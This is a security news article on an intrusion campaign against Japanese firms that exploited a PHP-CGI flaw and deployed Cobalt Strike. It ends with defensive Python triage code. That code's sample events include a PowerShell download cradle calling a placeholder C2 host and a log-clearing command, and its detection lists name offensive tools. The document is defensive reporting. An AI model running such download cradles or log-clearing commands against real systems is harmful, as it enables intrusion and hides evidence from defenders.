Attackers Targeting Japanese Firms with Cobalt Strike


Threat analysts have warned of a sophisticated cyber-intrusion campaign that predominantly targets organizations in Japan across the technology, telecommunications, entertainment, education and e-commerce sectors.

According to Cisco Talos, who discovered the campaign, the attackers exploited CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI implementation on Windows, to gain an initial foothold.

Once access was obtained, the attackers executed PowerShell scripts to deploy Cobalt Strike reverse HTTP shellcode, ensuring persistent remote access. Post-exploitation activities involved privilege escalation, credential theft and lateral movement using plugins from the publicly available Cobalt Strike kit “TaoWu.”

Key Stages of the Attack

The attackers leveraged a publicly available Python exploit script, PHP-CGI_CVE-2024-4577_RCE.py, to test for vulnerabilities. If successful, they injected PowerShell commands into the victim’s machine, initiating a payload download from their command-and-control (C2) server.

The key stages of the attack include:

  • Privilege escalation using JuicyPotato, RottenPotato and SweetPotato exploits
  • Persistence mechanisms via registry modifications, scheduled tasks and system process creation
  • Detection evasion by clearing Windows event logs using wevtutil commands
  • Network reconnaissance with tools such as fscan.exe and Seatbelt.exe
  • Credential theft via Mimikatz to dump NTLM hashes and plaintext passwords


The attackers utilized Ladon.exe to bypass User Account Control (UAC) and execute payloads stealthily. They also employed SharpTask.exe, SharpHide.exe and SharpStay.exe to manipulate registry keys and establish persistent services.

For lateral movement, they abused Group Policy Objects (GPOs) using SharpGPOAbuse.exe, scanning subnets for open ports and executing malicious scripts across compromised networks.

Misuse of Cloud-Based Adversarial Frameworks

The attackers leveraged containers hosted on Alibaba Cloud to deploy a pre-configured installer script, which facilitated the download of various offensive security tools. Among these tools is Blue-Lotus, a JavaScript webshell designed for cross-site scripting (XSS) and browser exploitation.

Additionally, they employed BeEF, a browser exploitation framework that allows for command execution through hooked web browsers.

Another tool in the attackers’ arsenal is Viper C2, a modular control framework that supports payload execution across multiple platforms.

While some tactics align with previously documented attacks by the You Dun (Dark Cloud Shield) hacker group, no definitive attribution has been made. Analysts noted similarities in Cobalt Strike usage, privilege escalation techniques and credential harvesting strategies.

Mitigation Strategies

Organizations should take the following steps to defend against similar attacks:

  • Patch systems immediately to remediate CVE-2024-4577
  • Restrict PowerShell execution using group policies
  • Monitor logs for unauthorized registry modifications
  • Deploy endpoint detection and response (EDR) solutions to detect Cobalt Strike activity
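The monitoring advice above can be turned into a simple triage rule set over process-creation telemetry. The following is an added example for illustration, not code from the Talos report; it assumes the web server runs PHP through php-cgi.exe, that events carry parent image, image and command line (as Sysmon Event ID 1 does), and uses constructed sample events rather than real logs.

```python
import re

# Constructed sample process-creation events (not taken from the report).
SAMPLE_EVENTS = [
    {"parent": r"C:\php\php-cgi.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c IEX(New-Object Net.WebClient)"
                ".DownloadString('http://c2.example.invalid/p')"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wevtutil.exe",
     "cmdline": "wevtutil cl Security"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\fscan.exe",
     "cmdline": "fscan.exe -h 10.0.0.0/24"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

# A web request handler should never be the parent of a shell (CVE-2024-4577 chain).
WEB_HANDLERS = {"php-cgi.exe", "w3wp.exe", "httpd.exe", "nginx.exe"}  # assumed names
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Tool names quoted in the article; matching on filename alone is a weak signal.
KNOWN_TOOLS = {"fscan.exe", "seatbelt.exe", "ladon.exe", "sharptask.exe",
               "sharphide.exe", "sharpstay.exe", "sharpgpoabuse.exe", "mimikatz.exe"}
LOG_CLEAR = re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.IGNORECASE)
DOWNLOAD_CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient)", re.IGNORECASE)

def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage_event(ev):
    """Return the list of detection labels that fire for one event."""
    findings = []
    parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
    if parent in WEB_HANDLERS and image in SHELLS:
        findings.append("web handler spawned shell")
    if image in SHELLS and DOWNLOAD_CRADLE.search(cmd):
        findings.append("download cradle")
    if LOG_CLEAR.search(cmd):
        findings.append("event log cleared")
    if image in KNOWN_TOOLS:
        findings.append(f"known tool: {image}")
    return findings

def triage(events):
    """Pair each event index with its findings, skipping events that fire nothing."""
    return [(i, f) for i, ev in enumerate(events) if (f := triage_event(ev))]
```

Log clearing also produces Security Event ID 1102 (and System Event ID 104), so that event should be alerted on alongside the command line; the filename-based tool rule is trivially bypassed by renaming and is only a starting point.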

The discovery of this attack reinforces the growing trend of threat actors exploiting public-facing applications for initial access. Organizations must remain vigilant against evolving adversarial tactics.
